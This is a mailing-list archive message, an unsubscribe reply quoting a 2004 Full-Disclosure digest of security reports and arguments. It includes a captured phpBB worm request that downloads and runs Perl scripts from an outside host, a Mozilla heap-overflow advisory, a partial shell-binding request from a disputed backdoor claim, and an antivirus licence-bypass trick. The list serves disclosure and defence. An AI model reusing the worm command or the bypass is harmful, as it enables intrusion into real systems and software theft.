Full Disclosure mailing list archives
[Full-Disclosure] RE: Full-disclosure Digest, Vol 1, Issue 2144
From: <steve.dangerfield () syntegra com>
Date: Thu, 30 Dec 2004 15:34:13 -0000
Please unsubscribe me from this list -----Original Message----- From: full-disclosure-request () lists netsys com [mailto:full-disclosure-request () lists netsys com] Sent: 30 December 2004 03:26 To: full-disclosure () lists netsys com Subject: Full-disclosure Digest, Vol 1, Issue 2144 Send Full-Disclosure mailing list submissions to full-disclosure () lists netsys com To subscribe or unsubscribe via the World Wide Web, visit https://lists.netsys.com/mailman/listinfo/full-disclosure or, via email, send a message with subject or body 'help' to full-disclosure-request () lists netsys com You can reach the person managing the list at full-disclosure-owner () lists netsys com When replying, please edit your Subject line so it is more specific than "Re: Contents of Full-Disclosure digest..." Today's Topics: 1. Re: Re: new phpBB worm affects 2.0.11 (Paul Laudanski) 2. Re: Again: zone transfers, a spammer's dream? (Jorrit Kronjee) 3. Re: Suspect phpBB users (Ron Brogden) 4. Re: And you're proud of this Mike Evanchick? (Michael Reilly) 5. Heap overflow in Mozilla Browser <= 1.7.3 NNTP code. (Maurycy Prodeus) 6. Re: And you're proud of this Mike Evanchick? (Ill will) 7. Re: And you're proud of this Mike Evanchick? (Michael Evanchik) 8. Is that your password? (psirt () cisco com) 9. Re: more: Isecom, osstm related: CRG was busted yesterday (Crg) 10. RE: Multiple Backdoors found in eEye Products (IRISand SecureIIS) (Marc Maiffret) 11. Trivial Bug in Symantec Security Products (J. Oquendo) 12. /bin/rm file access vulnerability (Lennart Hansen) 13. Re: Multiple Backdoors found in eEye Products (IRIS and Secure (Lance Gusto) 14. Re: /bin/rm file access vulnerability (Sean Harlow) 15. MDKSA-2004:159 - Updated glibc packages fix temporary file vulnerability (Mandrake Linux Security Team) ---------------------------------------------------------------------- Message: 1 Date: Wed, 29 Dec 2004 12:42:42 -0500 (EST) From: Paul Laudanski <zx () castlecops com> Subject: Re: [Full-disclosure] Re: new phpBB worm affects 2.0.11 To: Adam <adam () fazed org> Cc: bugtraq () securityfocus com, full-disclosure () lists netsys com Message-ID: <Pine.LNX.4.44.0412291241030.25738-100000 () bugsbunny castlecops com> Content-Type: TEXT/PLAIN; charset=US-ASCII Here are some samples of what this one does, and some statistics on 300,000 hits in 55 hours: http://castlecops.com/article-5642-nested-0-0.html On Sat, 25 Dec 2004, Adam wrote:
The request for this one (even against a non phpBB scripts) appears to look like this: "GET
/?p=comments&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20 crowklan.mine.nu/~pillar/.zk/coll;perl%20coll;wget%20crowklan.mine.nu/~pillar /.zk/aol;perl%20aol;rm%20-rf%20aol.*;rm%20-rf%20coll*%3B%20%65%63%68%6F%20%5F %45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47 %45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
HTTP/1.1"
-- Regards, Paul Laudanski - Computer Cops, LLC. CEO & Founder CastleCops(SM) - http://castlecops.com Promoting education and health in online security and privacy. ------------------------------ Message: 2 Date: Wed, 29 Dec 2004 19:49:46 +0100 From: Jorrit Kronjee <full-disclosure () nospam wafel org> Subject: Re: [Full-disclosure] Again: zone transfers, a spammer's dream? To: bugtraq () securityfocus com, full-disclosure () lists netsys com Message-ID: <41D2FC4A.60702 () nospam wafel org> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Ralf Glauberman wrote:
Hello all, after Lode Vermeiren having published on the 7th of December that many tlds are transferable I did further research on this. Much to my surprise this wasn't just a problem of little states. i did a complete scan on all tlds (http://data.iana.org/TLD/tlds-alpha-by-domain.txt) including every soa and ns server. i got results from 141 out of the 258 checked tlds. i din't check every single output, but there are not more than 10 false-positives within these. while the ca zone is secure now, i was really surprised that be (~ 42 MB, ~ 900.000 records) and fi (~ 11 MB, ~ 235.000 records) are transferable. all in all, i found that the following tlds are transferable (also there might be some false-positives):
arpa being one of those false positives (it's hardly exploitable by spammers anyway). Although only a few nameservers of the tld allow zone transfers - and you really have to look for them - it really amazes me that these nameservers aren't properly configured. I'm just glad I don't live in any of these countries. Jorrit ------------------------------ Message: 3 Date: Wed, 29 Dec 2004 10:58:40 -0800 From: Ron Brogden <domains () islandnet com> Subject: Re: [Full-disclosure] Suspect phpBB users To: full-disclosure () lists netsys com Message-ID: <200412291058.40811.domains () islandnet com> Content-Type: text/plain; charset="iso-8859-1" On December 25, 2004 15:54, Jack Yan wrote:
We have since upgraded, but among our new users over the last few days have been a Weber361, a Weber395, and a nderevyanko.
This looks like the fallout from a standard run of the mill spam bot. Thep
oint of its actions being to generate as many distinct links back to theu
ser's site as possible so as to increase their search engine placement. T
his is similar to referrer spamming in HTTP logs - just in this case it isa
n automated bot spamming forums instead of some other target. I doubt it is
caused by a worm, more likely one or more machines running dedicated software
(though it is possible this is installed on zombie machines I suppose).
Cheers
------------------------------
Message: 4
Date: Wed, 29 Dec 2004 12:50:57 -0800
From: Michael Reilly <michaelr () cisco com>
Subject: Re: [Full-disclosure] And you're proud of this Mike
Evanchick?
To: Todd Towles <toddtowles () brookshires com>
Cc: full-disclosure () lists netsys com
Message-ID: <41D318B1.4070605 () cisco com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Couldn't help seconding this. I do not understand the purpose of he
original message. I think Norton/Symantec did a good job.
michael
Todd Towles wrote:
Sounds like you need AV and a bit of network security. If you are scared
of IRC trojans and detectable viruses..then your time would be better
spent putting those systems into place. Don't you think?
________________________________
From: full-disclosure-bounces () lists netsys com
[mailto:full-disclosure-bounces () lists netsys com] On Behalf Of Elle
Chicka
Sent: Monday, December 27, 2004 11:16 PM
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] And you're proud of this Mike
Evanchick?
You so proudly posted this:
------------------------
http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.ht
ml
<https://mail.microsoft.com/exchweb/bin/redir.asp?URL=http://securityres
ponse.symantec.com/avcenter/venc/data/trojan.phel.a.html>
mike
www.michaelevanchik.com
------------------------
Obviously you are just tickled to see that the kiddies were able
to so quickly turn your point/click sploit code into a virus to wreak
havoc on my network.
Thanks a lot for helping to make all of us a little less secure
over the holiday's.
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
------------------------------------------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
--
---- ---- ----
Michael Reilly michaelr () cisco com
Cisco Systems, California
------------------------------
Message: 5
Date: Wed, 29 Dec 2004 22:24:21 +0100 (CET)
From: Maurycy Prodeus <z33d () isec pl>
Subject: [Full-disclosure] Heap overflow in Mozilla Browser <= 1.7.3
NNTP code.
To: full-disclosure () lists netsys com
Cc: bugtraq () securityfocus com
Message-ID: <Pine.LNX.4.44.0412292222140.19156-200000 () isec pl>
Content-Type: text/plain; charset="us-ascii"
********************************************************************
This email may contain information which is privileged or confidential. If you are not the intended recipient of this
email, please notify the sender immediately and delete it without reading, copying, storing, forwarding or disclosing
its contents to any other person
Thank you
Check us out at http://www.bt.com/consulting
********************************************************************
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Synopsis: Heap overflow in Mozilla Browser <= 1.7.3 NNTP code.
Product: Mozilla Browser
Version: <= 1.7.3
Vendor: http://www.mozilla.org/
URL: http://isec.pl/vulnerabilities/isec-0020-mozilla.txt
CVE: not assigned
Author: Maurycy Prodeus <z33d () isec pl>
Date: Dec 29, 2004
Issue:
======
A critical security vulnerability has been found in Mozilla Project code
handling NNTP protocol.
Details:
========
Mozilla browser supports NNTP urls. Remote side is able to trigger news://
connection to any server. I found a flaw in NNTP handling code which may
cause heap overflow and allow remote attacker to execute arbitrary code on
client machine.
Bugus function from nsNNTPProtocol.cpp:
char *MSG_UnEscapeSearchUrl (const char *commandSpecificData)
329 {
330 char *result = (char*) PR_Malloc (PL_strlen(commandSpecificData) +
1);
331 if (result)
332 {
333 char *resultPtr = result;
334 while (1)
335 {
336 char ch = *commandSpecificData++;
337 if (!ch)
338 break;
339 if (ch == '\\')
340 {
341 char scratchBuf[3];
342 scratchBuf[0] = (char) *commandSpecificData++;
343 scratchBuf[1] = (char) *commandSpecificData++;
344 scratchBuf[2] = '\0';
345 int accum = 0;
346 PR_sscanf(scratchBuf, "%X", &accum);
347 *resultPtr++ = (char) accum;
348 }
349 else
350 *resultPtr++ = ch;
351 }
352 *resultPtr = '\0';
353 }
354 return result;
355 }
When commandSpecificData points to last (next is NULL) character which
is '\\' copying loop may omit termination of source char array and overflow
result buffer.
Affected Versions
=================
Mozilla Browser <= 1.7.3 with mozilla-mail
Solution
=========
This bug is fixed in Mozilla 1.7.5. (Bug 264388)
Mozilla developer Dan Veditz claims that it cannot be exploitable:
"A '\' on the end will certainly trash memory, but at that point you're no
longer reading attacker-supplied data;".
On my RedHat 9.0 with Mozilla 1.7.3 attached proof of concept code
overflows the buffer using attacker-supplied data. I decided to make this
bug public because Mozilla Team hasn't warned users.
Exploitation
============
I have attached proof of concept HTML file which causes heap corruption
and crashes Mozilla 1.7.3 browser (with mozilla-mail). News server must be
existing and available.
- --
Maurycy Prodeus
iSEC Security Research
http://isec.pl/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQFB0yCXC+8U3Z5wpu4RAgmGAKDrytVxxUc0vS/9+BZNf+P+lGyoLQCeL5wN
atw5z5/GvBsG9SVKWeGZSbk=
=eTqU
-----END PGP SIGNATURE-----
-------------- next part --------------
An HTML attachment was scrubbed...
URL:
http://lists.netsys.com/pipermail/full-disclosure/attachments/20041229/8cbaf9
f1/nntp_crash-0001.html
------------------------------
Message: 6
Date: Wed, 29 Dec 2004 16:49:59 -0500
From: Ill will <xillwillx () gmail com>
Subject: Re: [Full-disclosure] And you're proud of this Mike
Evanchick?
Cc: full-disclosure () lists netsys com
Message-ID: <47fe50604122913491c574157 () mail gmail com>
Content-Type: text/plain; charset=US-ASCII
quitcher bitchin and get to work
On Wed, 29 Dec 2004 08:48:24 -0600, Todd Towles
<toddtowles () brookshires com> wrote:
Sounds like you need AV and a bit of network security. If you are scared of IRC trojans and detectable viruses..then your time would be better spent putting those systems into place. Don't you think? ________________________________ From: full-disclosure-bounces () lists netsys com [mailto:full-disclosure-bounces () lists netsys com] On Behalf Of Elle Chicka Sent: Monday, December 27, 2004 11:16 PM To: full-disclosure () lists netsys com Subject: [Full-disclosure] And you're proud of this Mike Evanchick? You so proudly posted this: ------------------------ http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.html mike www.michaelevanchik.com ------------------------ Obviously you are just tickled to see that the kiddies were able to so quickly turn your point/click sploit code into a virus to wreak havoc on my network. Thanks a lot for helping to make all of us a little less secure over the holiday's. __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
-- - illwill http://illmob.org ------------------------------ Message: 7 Date: Wed, 29 Dec 2004 18:02:55 -0500 From: "Michael Evanchik" <Mike () MichaelEvanchik com> Subject: Re: [Full-disclosure] And you're proud of this Mike Evanchick? To: "Todd Towles" <toddtowles () brookshires com>, "Elle Chicka" <c1b3r_chick () yahoo com>, <full-disclosure () lists netsys com> Message-ID: <01a701c4edfa$88578320$6702a8c0 () AlanPickel com> Content-Type: text/plain; charset="iso-8859-1" Todd, Listen, you are so wrong i cant belive you even have the guts to post this. How stupid can you be? Norton or any AVP can easily be fooled. The active x object "ca"+n b"+ +e crea" +ted" like this. code changed around , or even different local code can be used and tada AVP is fooled. Only a true patch from microsoft or disable the help control in the registry is going to stop this. Her concern is wise. Mike www.michaelevanchik.com ----- Original Message ----- From: Todd Towles To: Elle Chicka ; full-disclosure () lists netsys com Sent: Wednesday, December 29, 2004 9:36 AM Subject: RE: [Full-disclosure] And you're proud of this Mike Evanchick? Well, if you have Norton, it couldn't wreak havoc...now could it? Most of the AV compaines are now detecting the exploit. This detection response is much faster than most of the other exploits which are wreaking havoc on your network, so it would sound. Nice work to Norton. ---------------------------------------------------------------------------- From: full-disclosure-bounces () lists netsys com [mailto:full-disclosure-bounces () lists netsys com] On Behalf Of Elle Chicka Sent: Monday, December 27, 2004 11:16 PM To: full-disclosure () lists netsys com Subject: [Full-disclosure] And you're proud of this Mike Evanchick? You so proudly posted this: ------------------------ http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.html mike www.michaelevanchik.com ------------------------ Obviously you are just tickled to see that the kiddies were able to so quickly turn your point/click sploit code into a virus to wreak havoc on my network. Thanks a lot for helping to make all of us a little less secure over the holiday's. __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.netsys.com/pipermail/full-disclosure/attachments/20041229/84b847 7d/attachment-0001.htm ------------------------------ Message: 8 Date: Wed, 29 Dec 2004 16:10:53 -0800 From: psirt () cisco com Subject: [Full-disclosure] Is that your password? To: full-disclosure () lists netsys com Message-ID: <200412300010.iBU0AqvO028393 () lists netsys com> Content-Type: text/plain; charset="windows-1252" I have attached it to this mail. -------------- next part -------------- A non-text attachment was scrubbed... Name: pwd02.txt.scr Type: application/octet-stream Size: 29568 bytes Desc: not available Url : http://lists.netsys.com/pipermail/full-disclosure/attachments/20041229/a40429 a2/pwd02.txt-0001.obj ------------------------------ Message: 9 Date: Thu, 30 Dec 2004 01:43:51 +0100 From: "Crg" <crg () digitalsec net> Subject: Re: [Full-disclosure] more: Isecom, osstm related: CRG was busted yesterday To: full-disclosure () lists netsys com Message-ID: <006301c4ee08$d2342bc0$0302a8c0 () sia es> Content-Type: text/plain; charset="iso-8859-1" Well, Im not arrested, seems to be just a hoax for 28th of Dec (it's like 1st April in Spain). Keep the pr0j3kt alive Best regards & xmas Pedro Andujar (Crg) !dSR - Digital Security Research http://www.digitalsec.net ---------------------------------------------------------------------------- ------------------------- Author: your_momma () hushmail com Date: 2004-12-28 02:332004-12-28 01:33 +100UTC To: full-disclosure CC: Subject: [Full-disclosure] Isecom, osstm related: CRG was busted yesterday Flame wars are always bad wars. Yesterday one of us was busted by police and !dsr homes were abused looking for profit incoming about hacking isecom site. Crg was busted because of his curiosity, his funny way of learning. He's not an enemy, he's harmless, had no any weapon, not like the people that took him when he was going to school. Isecom can now be happy, another young boy hanged, time to make more cash with their "hackers high school". At the moment we only know one being arrested and other two under search. Names were not especified, and families are being contacted hardly withouth any kind of mercy because of christmas time. We're tired of this.. Anger.. War is over.. we're about rolf the whole planet. Stop playing with us! ------------------------------ Message: 10 Date: Wed, 29 Dec 2004 17:33:11 -0800 From: "Marc Maiffret" <mmaiffret () eeye com> Subject: RE: [Full-disclosure] Multiple Backdoors found in eEye Products (IRISand SecureIIS) To: "Lance Gusto" <thegusto22 () hotmail com>, <vuln-dev () securityfocus com>, <ntbugtraq () listserv ntbugtraq com>, <bugs () securitytracker com>, <full-disclosure () lists netsys com>, <news-editor () securityfocus com>, <press () net-security org> Message-ID: <19F34051C5BB60429ACD1BF01338C598E9A975 () av-mail01 corp int-eeye com> Content-Type: text/plain; charset="us-ascii" Hi Lance Gusto, It is really interesting that someone with such a disdain for my company would go out of their way to spam out an email about a supposed backdoor within our products, choose not to contact us ahead of time, and then provide no real details to prove your claim... Ahhh but wait, you chose not to provide any details because you're a "good guy". As you said: "Unfortunately, we can't release the "exploits" publicly due to the severity of these flaws." Right. The reason you could not provide any real details about these backdoors are because there are no backdoors in Iris nor SecureIIS. While I would not wish to give someone like you the time of day nor 15 minutes of infamy, eEye does take every security claim very seriously. We have performed an audit of SecureIIS and Iris code to re-verify what we already knew, that there are no backdoors in either of them. It is quite possible that you downloaded fake warez versions of our products from peer-to-peer networks which someone might have put there to trick people and put backdoors on their systems. However, if such warez product versions existed they would not be from eEye as we do not distribute our software on peer-to-peer networks nor recommend people downloading warez versions from there. Get your warez from a trusted distributor. ;-) If you would have contacted us we could have saved you the embarrassment... But then you are sending emails from Hotmail through a proxy at a university in Germany so I seriously doubt you care if your persona "Lance Gusto" gets embarrassed on public mailing lists. These backdoors are as much of a reality as Santa Claus but then you seem to be childish enough that you probably still believe in the jolly red man. Maybe next you can follow-up your humors eMail with a spoofed advisory about a backdoor you found in Rudolph "the red nosed reindeer". At least then you could promote yourself from being a coward to a comedian. Thank you, please drive through. Signed, Marc Maiffret Chief Hacking Officer eEye Digital Security T.949.349.9062 F.949.349.9538 http://eEye.com/Blink - End-Point Vulnerability Prevention http://eEye.com/Retina - Network Security Scanner http://eEye.com/Iris - Network Traffic Analyzer http://eEye.com/SecureIIS - Stop known and unknown IIS vulnerabilities Important Notice: This email is confidential, may be legally privileged, and is for the intended recipient only. Access, disclosure, copying, distribution, or reliance on any of it by anyone else is prohibited and may be a criminal offense. Please delete if obtained in error and email confirmation to the sender. P.S. I'm going to tell you this for your own benefit, your email was dope as hell especially since you faked 90 percent of it. What you need to do is practice on your freestyle before you come up missing like triple m's police file. | -----Original Message----- | From: full-disclosure-bounces () lists netsys com | [mailto:full-disclosure-bounces () lists netsys com] On Behalf | Of Lance Gusto | Sent: Tuesday, December 28, 2004 8:12 PM | To: vuln-dev () securityfocus com; | ntbugtraq () listserv ntbugtraq com; bugs () securitytracker com; | full-disclosure () lists netsys com; | news-editor () securityfocus com; press () net-security org | Subject: [Full-disclosure] Multiple Backdoors found in eEye | Products (IRISand SecureIIS) | | Multiple Backdoors found in eEye Products (IRIS and | SecureIIS) L. Gusto <thegusto22 () hotmail com> | | | Summary: | | During meticulous testing of both eEye's IRIS and SecureIIS | products, we (my testing team) have discovered multiple | backdoors in the latest of both mentioned products and some | older versions we could acquire. | | | These backdoors are very cleverly hidden (kudos to the | authors), I personally don't condone illegally backdooring | commercial products, and personally I don't think much of | eEye but I must give credit to where credit is due. | | | We have tested IRIS 3.7 and up they all appear to have a backdoor. | We have verified the IRIS backdoor doesn't exist in versions | prior to 3.0 | | | We have tested SecureIIS 2.0 and up they all appear to have a | backdoor. | We have verified that SecureIIS 1.x series does not have this | specific backdoor. | | Bringing the backdoors to light: | | After long testing we discovered the exact sequences used to | active the backdoor. Unfortunately, we can't release the | "exploits" publically due to the severity of these flaws. But | incomplete examples will be given. | | | | The IRIS Backdoor: | | This one is quite interesting. We have discovered that | sending a specifically crafted UDP datagram to a IRIS host | *directly* (not through the wire or to host on the network | segment) with certain IP options set and a certain magic | value at a undisclosed offset in the payload will bind a | shell to the source port specified in the UDP datagram. | | [snip] | | | The SecureIIS Backdoor: | | The SecureIIS backdoor was alot easier to discover but very | well placed. The SecureIIS backdoor is triggered by a | specifically crafted HTTP HEAD request. Here is a incomplete | layout of how to exploit this: | | | HEAD /<24 byte constant string>/PORT_ADDRESS.ASP HTTP/1.1 | | PORT - Will be the port to bind a shell. | ADDRESS - Address for priority binding (0 - For any). | | | [snip] | | | | Local Deduction: | | There are a two possiblilites here, either eEye's code has | been altered by some attacker or this has been sanctioned by | the company (or at least the developers were fully aware of this). | | | | Conclusion: | | It is very very shameful that a somewhat reputable like eEye | is acting in a very childish, unprofessional manner. I figure | that is why the code is closed source. There are several | active exploits available that I (the author of this | advisory) didn't create floating around. The only logical | solution will be to not use the mentioned eEye products for | the time being or at least downgrade to the non-backdoored versions. | | We will be investigation eEye's Blink Product for any | clandestine backdoors. | | _________________________________________________________________ | FREE pop-up blocking with the new MSN Toolbar - get it now! | http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/ | | _______________________________________________ | Full-Disclosure - We believe in it. | Charter: http://lists.netsys.com/full-disclosure-charter.html | ------------------------------ Message: 11 Date: Wed, 29 Dec 2004 17:56:28 -0500 (EST) From: "J. Oquendo" <sil () infiltrated net> Subject: [Full-disclosure] Trivial Bug in Symantec Security Products To: full-disclosure () lists netsys com Message-ID: <Pine.GSO.4.58.0412291754080.9648 () kungfunix net> Content-Type: TEXT/PLAIN; charset=US-ASCII Impact: Bug in Symantec products allows for free software updates Version(s): Norton AntiVirus for Windows 9x/NT/Me/2000/XP Symantec Web Security Symantec AntiVirus Scan Engine Norton AntiVirus for Gateways Symantec AntiVirus for Gateways Norton AntiVirus Corporate Edition Symantec AntiVirus Corporate Edition Norton AntiVirus for Exchange I. BACKGROUND Symantec whose stock price of $27.38 at market close on December 15, 2004, valuing the company at approximately $13.5 billion (according to their home page) has a simple little glitch in the above mentioned products, which would allow any user who has an expired product to automatically continue updating without purchasing the software after the program has expired. Vendor notified on 12/06/2004 II. DESCRIPTION Any user with an expired copy of the versions listed above can continue to receive updates at no extra cost. While not a true to form "bug", the silly workaround can hinder Symantec's future market valuations if users simply allowed their products to expire, downloaded any "Intelligent Updater" definitions via http://securityresponse.symantec.com/avcenter/defs.download.html and installed them with the clock turned back to a pre-expiration date. Somehow, Symantec engineers have not implemented a mechanism to disallow a user from installing the patches via changing the date on their computer back to when the original program was installed and then running the "Intelligent Updater." E.g.: User installs a 60 day trial version with free updates that expires on Jan, 01, 2005. User goes to install an update in July 2005 and gets a subscription error. User changes the date back to some time before the product expired and installs the new definition without problems. User changes date back forward without problems. While not of the "Bugtraq" typical bug, Symantec engineers should try to resolve this to avoid any future revenue loss. III SOLUTION Symantec could rewrite their updates to include a timer, or check via atomic clock. Other options include informing their customers not to commit the evil act of modifying the dates on their computers. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo GPG Key ID 0x51F9D78D Fingerprint 2A48 BA18 1851 4C99 CA22 0619 DB63 F2F7 51F9 D78D http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x51F9D78D sil @ politrix . org http://www.politrix.org sil @ infiltrated . net http://www.infiltrated.net "How can we account for our present situation unless we believe that men high in this government are concerting to deliver us to disaster?" Joseph McCarthy "America's Retreat from Victory" ------------------------------ Message: 12 Date: Wed, 29 Dec 2004 20:18:25 -0500 From: "Lennart Hansen" <xenzeo () gardener com> Subject: [Full-disclosure] /bin/rm file access vulnerability To: full-disclosure () lists netsys com Message-ID: <20041230011825.21A116EEF6 () ws1-5 us4 outblaze com> Content-Type: text/plain; charset="iso-8859-1" /bin/rm file access vulnerability Affected Products: /bin/rm (all versions, tested on FreeBSD and linux) (http://www.freebsd.org http://www.kernel.org) Author: Xenzeo (Ablazed, Ultralaser, Lennart A. Hansen) xenzeo at blackhat dot dk /bin/rm is a program that removes the named file arguments on unix systems. When /bin/rm is called it checks the file's permissions and the id of the user trying to remove the file. If the user does not have the required permissions to delete the file, /bin/rm will simply reject and exit. However, it is possible for a person with admin rights (root) to delete _any_ file on the system regardless of who has created it and what it's permissions are. Proof of concepts: $ touch /home/xenzeo/file $ ls -l /home/xenzeo/file -rw-r--r-- 1 xenzeo none 0 Dec 30 2004 /home/xenzeo/file $ id uid=1000(xenzeo) gid=513(none) groups=513(none),545(users) $ su -c 'rm -f /home/xenzeo/file' $ ls -l /home/xenzeo/file ls: file: No such file or directory #!/usr/bin/perl if ($#ARGV != 0) { die "usage: rm-exploit.pl file\r\n"; } else { $file = $ARGV[0]; print "*** CMD: [ /bin/rm -f $file ]\r\n"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; if ($> == 0) { print "[-] EXECUTING CMD\r\n"; system("/bin/rm -f $file"); print "[-] DONE\r\n"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); } else { print "[-] EXPLOIT FAILED\r\n"; print "[-] YOU ARE NOT ROOT\r\n"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; } } Vender status: Neither FreeBSD nor Linux developers have been contacted yet! -Xenzeo -- ___________________________________________________________ Sign-up for Ads Free at Mail.com http://promo.mail.com/adsfreejump.htm ------------------------------ Message: 13 Date: Wed, 29 Dec 2004 21:03:02 +0000 From: "Lance Gusto" <thegusto22 () hotmail com> Subject: Re: [Full-disclosure] Multiple Backdoors found in eEye Products (IRIS and Secure To: dave () immunitysec com, full-disclosure () lists netsys com Message-ID: <BAY2-F347D60BC3A6AB7882C2046CC9B0 () phx gbl> Content-Type: text/plain; format=flowed Hey Dave, I cannot disclosed much information (based on request/threats made by certain organizations whom may be involved) I am sure you can understand. But we have tested Iris versions 3.0 and up ... As I previously stated itd oesn't appear to exist in the 2.x series of Iris. I am not the main tester involved here, but I was told that there is somes ort of clandestine chaining mechanism to create the processes I believe. I will provide the "lists" I have sent this too with more information as soon as some of the other testers involved come back from their respective holiday breaks.
From: Dave Aitel <dave () immunitysec com> To: Lance Gusto <thegusto22 () hotmail com> Subject: Re: [Full-disclosure] Multiple Backdoors found in eEye Products>
(IRIS and SecureIIS)
Date: Wed, 29 Dec 2004 11:29:55 -0500The SecureIIS Backdoor: The SecureIIS backdoor was alot easier to discover but very well placed. The SecureIIS backdoor is triggered by a specifically crafted HTTP HEAD request. Here is a incomplete layout of how to exploit this:Which version did you test? I'm not seeing it, or any intermodular calls to CreateProcess in the DLL that it loads up. -daveHEAD /<24 byte constant string>/PORT_ADDRESS.ASP HTTP/1.1 PORT - Will be the port to bind a shell. ADDRESS - Address for priority binding (0 - For any). [snip] Local Deduction: There are a two possiblilites here, either eEye's code has been altered by some attacker or this has been sanctioned by the company (or at least the developers were fully aware of this). Conclusion: It is very very shameful that a somewhat reputable like eEye is acting in a very childish, unprofessional manner. I figure that is why the code is closed source. There are several active exploits available that I (the author of this advisory) didn't create floating around. The only logical solution will be to not use the mentioned eEye products for the time being or at least downgrade to the non-backdoored versions. We will be investigation eEye's Blink Product for any clandestine backdoors. _________________________________________________________________ FREE pop-up blocking with the new MSN Toolbar - get it now! http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_________________________________________________________________ Don't just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/ ------------------------------ Message: 14 Date: Wed, 29 Dec 2004 21:17:12 -0500 From: Sean Harlow <sharlow () UTNet UToledo Edu> Subject: Re: [Full-disclosure] /bin/rm file access vulnerability To: full-disclosure () lists netsys com Message-ID: <41D36528.1070308 () utnet utoledo edu> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Is this a joke? root can delete any file...isn't that the point of being root? the fact that you can do anything with the system, regardless of permissions? -Sean Lennart Hansen wrote:
/bin/rm file access vulnerability
Affected Products:
/bin/rm (all versions, tested on FreeBSD and linux)
(http://www.freebsd.org http://www.kernel.org)
Author:
Xenzeo (Ablazed, Ultralaser, Lennart A. Hansen)
xenzeo at blackhat dot dk
/bin/rm is a program that removes the named file arguments on unix systems.
When /bin/rm is called it checks the file's permissions and the id of the
user
trying to remove the file. If the user does not have the required
permissions
to delete the file, /bin/rm will simply reject and exit. However, it is possible for a person with admin rights (root) to delete _any_ file on the system regardless of who has created it and what it's permissions
are.
Proof of concepts:
$ touch /home/xenzeo/file
$ ls -l /home/xenzeo/file
-rw-r--r-- 1 xenzeo none 0 Dec 30 2004 /home/xenzeo/file
$ id
uid=1000(xenzeo) gid=513(none) groups=513(none),545(users)
$ su -c 'rm -f /home/xenzeo/file'
$ ls -l /home/xenzeo/file
ls: file: No such file or directory
#!/usr/bin/perl
if ($#ARGV != 0) {
die "usage: rm-exploit.pl file\r\n";
} else {
$file = $ARGV[0];
print "*** CMD: [ /bin/rm -f $file ]\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
if ($> == 0) {
print "[-] EXECUTING CMD\r\n";
system("/bin/rm -f $file");
print "[-] DONE\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
exit();
} else {
print "[-] EXPLOIT FAILED\r\n";
print "[-] YOU ARE NOT ROOT\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
}
}
Vender status:
Neither FreeBSD nor Linux developers have been contacted yet!
-Xenzeo
------------------------------
Message: 15
Date: 30 Dec 2004 03:24:39 -0000
From: Mandrake Linux Security Team <security () linux-mandrake com>
Subject: [Full-disclosure] MDKSA-2004:159 - Updated glibc packages fix
temporary file vulnerability
To: full-disclosure () lists netsys com
Message-ID: <20041230032439.10118.qmail () updates mandrakesoft com>
********************************************************************
This email may contain information which is privileged or confidential. If you are not the intended recipient of this
email, please notify the sender immediately and delete it without reading, copying, storing, forwarding or disclosing
its contents to any other person
Thank you
Check us out at http://www.bt.com/consulting
********************************************************************
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandrakelinux Security Update Advisory
_______________________________________________________________________
Package name: glibc
Advisory ID: MDKSA-2004:159
Date: December 29th, 2004
Affected versions: 10.0, 10.1
______________________________________________________________________
Problem Description:
The Trustix developers discovered that the catchsegv and glibcbug
utilities, part of the glibc package, created temporary files in an
insecure manner. This could allow for a symlink attack to create or
overwrite arbitrary files with the privileges of the user invoking the
program.
The updated packages have been patched to correct this issue.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0968
______________________________________________________________________
Updated Packages:
Mandrakelinux 10.0:
d3c0d6fae4d7929830090e8c91466951 10.0/RPMS/glibc-2.3.3-12.8.100mdk.i586.rpm
478aecbe69470a0466c0b6f685e63282
10.0/RPMS/glibc-debug-2.3.3-12.8.100mdk.i586.rpm
29313f60b5702b00eb709781f47b2d39
10.0/RPMS/glibc-devel-2.3.3-12.8.100mdk.i586.rpm
b4e97a220b40a2641bd3285bf2fc990d
